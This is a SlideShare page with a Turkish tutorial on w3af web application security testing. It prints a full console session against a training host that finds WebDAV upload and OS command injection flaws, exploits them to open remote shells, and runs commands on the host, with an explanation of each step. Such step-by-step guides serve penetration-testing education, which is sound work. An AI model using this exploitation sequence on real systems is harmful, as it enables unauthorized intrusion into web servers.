SlideShare une entreprise Scribd logo
1  sur  6
Télécharger pour lire hors ligne
W3af ile Web Uygulama Güvenlik Testleri

Birkaç tıkla web sayfalarının, veritabanlarının hacklenebildiği, bir komutla kablosuz ağ
şifrelerin kırıldığı günleri yaşıyoruz. Çok değil birkaç yıl öncesi sadece konusunun uzmanı
kişiler tarafından yapılabilecek bu tip işlemler artık herkes tarafından otomatize araçlarla
yapılabilir hale geldi.
Bu süreçte sistemlerimize etkin koruma sağlayabilmek için bir güvenlikçi olarak önümüzde
iki yol olduğunu düşünüyorum: biri piyasada olup bitenden habersiz sadece bize tavsiye
edilen güvenlik önlemlerini almak, cihazları varsayılan ayarlarla kullanmak diğeri ise siyah
şapkalıların kullandığı bu araçları hangi mantıkla çalıştıklarını anlayarak kullanmak ve ona
göre önlemler almak.
Kendini beyaz konumda görenler hiç şüphesiz ikinci şıkkı tercih edeceklerdir.
Bilişim güvenliği konusuna bir şekilde uzaktan bile olsa merak salmış herkesin bildiği bir
Live Cd var, adı Backtrack. çinde her konuda yüzlerce güvenlik tarama aracı var. Sadece bu
dağıtım ile birlikte gelen araçları kullanarak yaptığımız testlerde tavsiye edilen ayarlarla
kullanılan NIPS(Network Intrusion Prevention System) ve
WAF(Web Application Firewall)sistemlerin bazı
durumlarda çok bir koruma sağlayamadığını gördük.
Bunun temel sebebi bu tip sistemlerin yönetiminin sıradan
Firewall yönetimi gibi sadece 1 ve 0 dan oluşmadığı(bir
kural vardır ve bu kuralda ilgili ip ve portlara ya izin
verilecektir ya da yasaklanacaktır), kullanılan yazılımın
ötesinde konsepte hakimiyet gerektirdiğidir.
Geçen yazıda bu tip otomatize edilmiş araçların en yenilerinden birine değinmiştim, W3af.
W3af, kısaca web uygulamalarına karşı çeşitli güvenlik taramalarını gerçekleştirmek için
kullanılan araçları bir çatı altında toplayan ve kullanımlarını kolaylaştıran açık kaynak kodlu
bir yazılım.
Bu yazıda da W3af kullanarak zafiyet içeren web uygulamalarının nasıl kolaylıkla(birkaç
tıklama ya da komutlar serisi ile)hacklenebileceğini bir iki örnek ile anlatmaya çalışacağım.

W3af ile şletim Sisteminde Komut Çalıştırma
Dışardan aldığı parametreleri süzgeçten geçirmeden işletim sistemine aktaran bir web
uygulamasına W3af ile yapılan test ve çıktıları:

lifeoverip~#./w3af
w3af>>> plugins
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output
Enabled output plugins:
console
htmlFile
w3af/plugins>>> output config htmlFile
w3af/plugin/textFile>>> set fileName beyazsapka.html
w3af/plugin/textFile>>> back
w3af/plugins>>> output config console
w3af/plugin/console>>> set verbosity 0
w3af/plugin/console>>> back
w3af/plugins>>> audit dav, osCommanding,xss,xsrf
w3af/plugins>>> discovery serverHeader,allowedMethods,pykto
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://egitim-test/w3af/dav/,
http://egitim-test/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/target>>> back
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
The Server header for this HTTP server is: Apache
The URL: "http://egitim-test/w3af/dav/" has the following DAV methods enabled:
- COPY, DELETE, GET, HEAD, LOCK, MOVE, OPTIONS, POST, PROPFIND,
PROPPATCH,
TRACE, UNLOCK
Found 2 URLs and 2 different points of injection.
The list of URLs is:
- http://egitim-test/w3af/dav/
- http://egitim-test/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://egitim-test/w3af/dav/ | Method: GET
- http://egitim-test/w3af/osCommanding/vulnerable.php | Method: GET |
Parameters: (command)
Starting dav plugin execution.
100% [====================================================] 2/2
Directory listing with HTTP PROPFIND method was found at directory:
http://egitim-test/w3af/dav/ The vulnerability was found in the request with
id 11.
File upload with HTTP PUT method was found at directory:
http://egitim-test/w3af/dav/ . Uploaded test file:
http://egitim-test/w3af/dav/FReli The vulnerability was found in the request
with id 9.
Starting osCommanding plugin execution.
100% [====================================================] 2/2
OS Commanding was found at:
http://egitim-test/w3af/osCommanding/vulnerable.php . Using method: GET. The
data sent was: command=+ping+-c+6+egitim-test The vulnerability was found in
the request with id 15.
w3af>>> exploit
w3af/exploit>>> exploit *
Using plugin: davShell
davShell exploit plugin is starting.
Vulnerability successfully exploited.
Using plugin: osCommandingShell
osCommandingShell exploit plugin is starting.
Vulnerability successfully exploited.
remoteFileIncludeShell plugin has to be correctly configured to use.
w3af/exploit>>> interact
This is a list of available shells:
- [0] <davShell object (ruser: "nobody" | rsystem: "Linux bt 2.6.20-BT-PwnSauce-NOSMP
i686 GNU/Linux")>
- [1] <osCommandingShell object (ruser: "nobody" | rsystem: "Linux bt 2.6.20-BTPwnSauce-NOSMP i686 GNU/Linux")>
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in
this menu will be runned on the remote web server.
w3af/exploit/davShell-0>>> ls
base/ beef/ beyazsapka.html dav/ manual/ phpnuke/ unicornscan/ w3af/
w3af/exploit/davShell-0>>> w
23:24:12 up 16:20, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM
LOGIN@ IDLE JCPU PCPU WHAT
root tty1 07:05 15:03m 0.74s 0.01s /bin/sh /usr/X11R6/bin/startx
root pts/8 192.168.2.2
22:24 59:28 0.02s 0.02s -bash
root pts/9 192.168.2.2
23:16 0.00s 0.05s 0.01s w
w3af/exploit/davShell-0>>> endInteraction

Temel komutları adım adım incelersek karışık gibi görünen konsol kullanımının aslında bu
işin temelinde yatan bazı terimlere ve konsepte bağlı olduğunu görürüz.
output console,htmlFile : programın ürettiği çıktıların nasıl saklanacağını belirtir. Sonrasında
verilen “output config htmlFile” komutu çıktıları kaydedeceğimiz html dosyasına ait
özellikleri belirmek için kullanılır. Bir sonraki “set fileName beyazsapka.html” komutu ise
çıktıların beyazsapka.html adlı dosyaya html formatında işleneceğini gösterir.
audit dav, osCommanding,xss,xsrf : audit plugini hedef sistem üzerinde yapılacak ön
denetimleri belirlemek için kullanılır. Yani sistemde varolan açıklıkların test edildiği ve varsa
açıklık hangi dizin, url altında olduğunu bulmak için kullanıyoruz. Bizim örneğimizde dav,
OsCommanding, xss ve xsrf zafiyetlerini sistem üzerinde test ettik.
discovery serverHeader,allowedMethods,pykto : discovery plugini ile hedef seçilen sistem
üzerinde keşif seviyesinde araştırmaları yapılır. Bu keşiflere örnek olarak sunucunun üzerinde
çalıştığı platform tipi, web sunucu yazılımının izin verdiği http metodları, ya da web sayfası
üzerinden direkt erişimi olmayıp da basit testler sonucu ulaşılabilecek dizin/dosyaları
verebiliriz.
set target http://egitim-test/w3af/dav/ : set target komutu testleri hangi sistem üzerinde
gerçekleştireceğimizi belirtir. Burada yerine göre özel bir url ya da web sayfası verilebilir.
start: audit ve discovery pluginlerini çalıştırmak için kullanılır.
exploit * : Önceki aşamalarda bulunan ve exploit edilebilecek zafiyetleri değerlendirmek için
kullanılır. Burada * diyerek tüm zafiyetleri değerlendirebiliriz ya da zafiyet numarası
belirterek sadece ilgili açıklığı exploit etmesini sağlayabiliriz.
nteract : başarı ile exploit edilmiş sistemlerde açılan shell numaralarını öğrenerek shell’ler
aracılığı ile sisteme giriş yapmayı sağlayan komut. Parametresiz kullanıldığında
This is a list of available shells:
..
Şeklinde bir çıktı verecektir. Buradan istenilen shell numarası seçilerek sistemle shell
üzerinden iletişim kurulabilir.
>>> interact 0 gibi.
Açılmış bir shell kapatılmak istenirse endInteraction komutu kullanılabilir.
Görüleceği üzere komutlar ve parametreleri herhangi bir önbilgi ve ezber gerektirmiyor.
Birkaç kere kullanıldıktan sonra aşina olunacak tipten. Yine de komut satırı parametreleri
karışık geldiyse W3af’nin GUI sini kullanıp aynı işlemi birkaç tıklamayla halledebilirsiniz.
W3af ile SQL Injection
Dışardan aldığı değerleri süzgeçten geçirmeden veritabanına gönderen bir web uygulamasının
W3af kullanılarak hacklenmesi
Kaynaklar:
[1] http://w3af.sourceforge.net
[2] http://www.owasp.org

Contenu connexe

Tendances

Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif Çalışmaları
BGA Cyber Security
 
Web Application Firewall Tercih Rehberi
Web Application Firewall Tercih RehberiWeb Application Firewall Tercih Rehberi
Web Application Firewall Tercih Rehberi
BGA Cyber Security
 
Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?
Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?
Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?
BGA Cyber Security
 
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm ÖnerileriHosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
BGA Cyber Security
 
Web Sunucularına Yönelik DDoS Saldırıları
Web Sunucularına Yönelik DDoS SaldırılarıWeb Sunucularına Yönelik DDoS Saldırıları
Web Sunucularına Yönelik DDoS Saldırıları
BGA Cyber Security
 
Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)
BGA Cyber Security
 

Tendances (20)

Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif Çalışmaları
 
TCP/IP Ağlarda İleri Seviye Paket Analizi – Tshark
TCP/IP Ağlarda İleri Seviye Paket Analizi – TsharkTCP/IP Ağlarda İleri Seviye Paket Analizi – Tshark
TCP/IP Ağlarda İleri Seviye Paket Analizi – Tshark
 
Web Application Firewall Tercih Rehberi
Web Application Firewall Tercih RehberiWeb Application Firewall Tercih Rehberi
Web Application Firewall Tercih Rehberi
 
Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?
Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?
Çalıştay | DDoS Saldırıları Nasıl Gerçekleştirilir?
 
Holynix v1
Holynix v1Holynix v1
Holynix v1
 
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm ÖnerileriHosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
Hosting Firmalarına Yönelik DDoS Saldırıları ve Çözüm Önerileri
 
Web Sunucularına Yönelik DDoS Saldırıları
Web Sunucularına Yönelik DDoS SaldırılarıWeb Sunucularına Yönelik DDoS Saldırıları
Web Sunucularına Yönelik DDoS Saldırıları
 
Open source ddos engelleme
Open source ddos engellemeOpen source ddos engelleme
Open source ddos engelleme
 
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma   sonAçık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma   son
Açık kaynak kodlu uygulamalar ile adli bilişim labaratuarı kurma son
 
Nmap & Hping
Nmap & HpingNmap & Hping
Nmap & Hping
 
Adli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAdli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim Araçları
 
Kali linux
Kali linuxKali linux
Kali linux
 
Hacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShellHacker’ların Yeni Gozdesi - PowerShell
Hacker’ların Yeni Gozdesi - PowerShell
 
DDoS Engelleme Ürünleri
DDoS Engelleme ÜrünleriDDoS Engelleme Ürünleri
DDoS Engelleme Ürünleri
 
Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)Derinlemesine Paket İnceleme (Deep Packet Inspection)
Derinlemesine Paket İnceleme (Deep Packet Inspection)
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
BackTrack Linux-101 Eğitimi
BackTrack Linux-101 EğitimiBackTrack Linux-101 Eğitimi
BackTrack Linux-101 Eğitimi
 
Oracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi ÇalışmalarıOracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi Çalışmaları
 
pfSense 2.0 Eğitim Sunumu
pfSense 2.0 Eğitim SunumupfSense 2.0 Eğitim Sunumu
pfSense 2.0 Eğitim Sunumu
 
OpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma ÖzellikleriOpenBSD PAcket Filter DDoS Koruma Özellikleri
OpenBSD PAcket Filter DDoS Koruma Özellikleri
 

En vedette

HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)
BGA Cyber Security
 
Nessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıNessus Kullanım Kitapçığı
Nessus Kullanım Kitapçığı
BGA Cyber Security
 
E-posta Başlıklarından Bilgi Toplama
E-posta Başlıklarından Bilgi ToplamaE-posta Başlıklarından Bilgi Toplama
E-posta Başlıklarından Bilgi Toplama
BGA Cyber Security
 
Bilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres AnaliziBilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres Analizi
BGA Cyber Security
 

En vedette (20)

HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)
 
Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)
 
Nessus Kullanım Kitapçığı
Nessus Kullanım KitapçığıNessus Kullanım Kitapçığı
Nessus Kullanım Kitapçığı
 
TCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
TCP/IP Ağlarda Parçalanmış Paketler ve EtkileriTCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
TCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
 
Örnek Spam Çözümü: TTNET SMTP Portunu Engelleme
Örnek Spam Çözümü: TTNET SMTP Portunu EngellemeÖrnek Spam Çözümü: TTNET SMTP Portunu Engelleme
Örnek Spam Çözümü: TTNET SMTP Portunu Engelleme
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
 
BGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması Çözümleri
 
Nmap Kullanım Kitapçığı
Nmap Kullanım KitapçığıNmap Kullanım Kitapçığı
Nmap Kullanım Kitapçığı
 
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders NotlarıBeyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
 
FTP ve Güvenlik Duvarları
FTP ve Güvenlik DuvarlarıFTP ve Güvenlik Duvarları
FTP ve Güvenlik Duvarları
 
E-posta Başlıklarından Bilgi Toplama
E-posta Başlıklarından Bilgi ToplamaE-posta Başlıklarından Bilgi Toplama
E-posta Başlıklarından Bilgi Toplama
 
Bilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres AnaliziBilişim Suçlarında IP Adres Analizi
Bilişim Suçlarında IP Adres Analizi
 
Holynix v2
Holynix v2Holynix v2
Holynix v2
 
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama KitabıWeb ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
 
Sql, Sql Injection ve Sqlmap Kullanımı
Sql, Sql Injection ve Sqlmap KullanımıSql, Sql Injection ve Sqlmap Kullanımı
Sql, Sql Injection ve Sqlmap Kullanımı
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
 
Güvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi ToplamaGüvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi Toplama
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 

Similaire à W3af ile Web Uygulama Güvenlik Testleri – II

Web Uygulamalarında Kaynak Kod Analizi - 1
Web Uygulamalarında Kaynak Kod Analizi - 1Web Uygulamalarında Kaynak Kod Analizi - 1
Web Uygulamalarında Kaynak Kod Analizi - 1
Mehmet Ince
 
Metasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiMetasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik Denetimi
Fatih Ozavci
 
Infraskope Security Event Manager
Infraskope  Security  Event  ManagerInfraskope  Security  Event  Manager
Infraskope Security Event Manager
logyonetimi
 

Similaire à W3af ile Web Uygulama Güvenlik Testleri – II (20)

Hacking'in Mavi Tarafı -2
Hacking'in Mavi Tarafı -2Hacking'in Mavi Tarafı -2
Hacking'in Mavi Tarafı -2
 
Web Uygulamalarında Kaynak Kod Analizi - 1
Web Uygulamalarında Kaynak Kod Analizi - 1Web Uygulamalarında Kaynak Kod Analizi - 1
Web Uygulamalarında Kaynak Kod Analizi - 1
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
 
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMISINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
SINIFLANDIRMA TEMELLİ KORELASYON YAKLAŞIMI
 
Linux Yaz Kampı 2016 pfSense Firewall ve Router Eğitim Dökümanı
Linux Yaz Kampı 2016 pfSense Firewall ve Router Eğitim DökümanıLinux Yaz Kampı 2016 pfSense Firewall ve Router Eğitim Dökümanı
Linux Yaz Kampı 2016 pfSense Firewall ve Router Eğitim Dökümanı
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
 
İş Ortamlarına Saldırı Tespit Sisteminin Kurulması
İş Ortamlarına Saldırı Tespit Sisteminin Kurulmasıİş Ortamlarına Saldırı Tespit Sisteminin Kurulması
İş Ortamlarına Saldırı Tespit Sisteminin Kurulması
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage Kullanımı
 
Scada Sistemleri ve Güvenliği
Scada Sistemleri ve GüvenliğiScada Sistemleri ve Güvenliği
Scada Sistemleri ve Güvenliği
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploit
 
Bitdefender gravityzone yapılandırma_tekvizyon
Bitdefender gravityzone yapılandırma_tekvizyonBitdefender gravityzone yapılandırma_tekvizyon
Bitdefender gravityzone yapılandırma_tekvizyon
 
Metasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik DenetimiMetasploit Framework ile Güvenlik Denetimi
Metasploit Framework ile Güvenlik Denetimi
 
Tekvizyon bitdefender-gravityzone bulut-panel-yapılandırma
Tekvizyon bitdefender-gravityzone bulut-panel-yapılandırmaTekvizyon bitdefender-gravityzone bulut-panel-yapılandırma
Tekvizyon bitdefender-gravityzone bulut-panel-yapılandırma
 
Infraskope Security Event Manager
Infraskope  Security  Event  ManagerInfraskope  Security  Event  Manager
Infraskope Security Event Manager
 
45965 php-source-code-analysis
45965 php-source-code-analysis45965 php-source-code-analysis
45965 php-source-code-analysis
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATION
 
Nagios ile Sistem ve Network Monitoring
Nagios ile Sistem ve Network MonitoringNagios ile Sistem ve Network Monitoring
Nagios ile Sistem ve Network Monitoring
 
.Net ile yazılım güvenliği
.Net ile yazılım güvenliği.Net ile yazılım güvenliği
.Net ile yazılım güvenliği
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
 

Plus de BGA Cyber Security

Plus de BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 

W3af ile Web Uygulama Güvenlik Testleri – II

  • 1. W3af ile Web Uygulama Güvenlik Testleri Birkaç tıkla web sayfalarının, veritabanlarının hacklenebildiği, bir komutla kablosuz ağ şifrelerin kırıldığı günleri yaşıyoruz. Çok değil birkaç yıl öncesi sadece konusunun uzmanı kişiler tarafından yapılabilecek bu tip işlemler artık herkes tarafından otomatize araçlarla yapılabilir hale geldi. Bu süreçte sistemlerimize etkin koruma sağlayabilmek için bir güvenlikçi olarak önümüzde iki yol olduğunu düşünüyorum: biri piyasada olup bitenden habersiz sadece bize tavsiye edilen güvenlik önlemlerini almak, cihazları varsayılan ayarlarla kullanmak diğeri ise siyah şapkalıların kullandığı bu araçları hangi mantıkla çalıştıklarını anlayarak kullanmak ve ona göre önlemler almak. Kendini beyaz konumda görenler hiç şüphesiz ikinci şıkkı tercih edeceklerdir. Bilişim güvenliği konusuna bir şekilde uzaktan bile olsa merak salmış herkesin bildiği bir Live Cd var, adı Backtrack. çinde her konuda yüzlerce güvenlik tarama aracı var. Sadece bu dağıtım ile birlikte gelen araçları kullanarak yaptığımız testlerde tavsiye edilen ayarlarla kullanılan NIPS(Network Intrusion Prevention System) ve WAF(Web Application Firewall)sistemlerin bazı durumlarda çok bir koruma sağlayamadığını gördük. Bunun temel sebebi bu tip sistemlerin yönetiminin sıradan Firewall yönetimi gibi sadece 1 ve 0 dan oluşmadığı(bir kural vardır ve bu kuralda ilgili ip ve portlara ya izin verilecektir ya da yasaklanacaktır), kullanılan yazılımın ötesinde konsepte hakimiyet gerektirdiğidir. Geçen yazıda bu tip otomatize edilmiş araçların en yenilerinden birine değinmiştim, W3af. W3af, kısaca web uygulamalarına karşı çeşitli güvenlik taramalarını gerçekleştirmek için kullanılan araçları bir çatı altında toplayan ve kullanımlarını kolaylaştıran açık kaynak kodlu bir yazılım. Bu yazıda da W3af kullanarak zafiyet içeren web uygulamalarının nasıl kolaylıkla(birkaç tıklama ya da komutlar serisi ile)hacklenebileceğini bir iki örnek ile anlatmaya çalışacağım. W3af ile şletim Sisteminde Komut 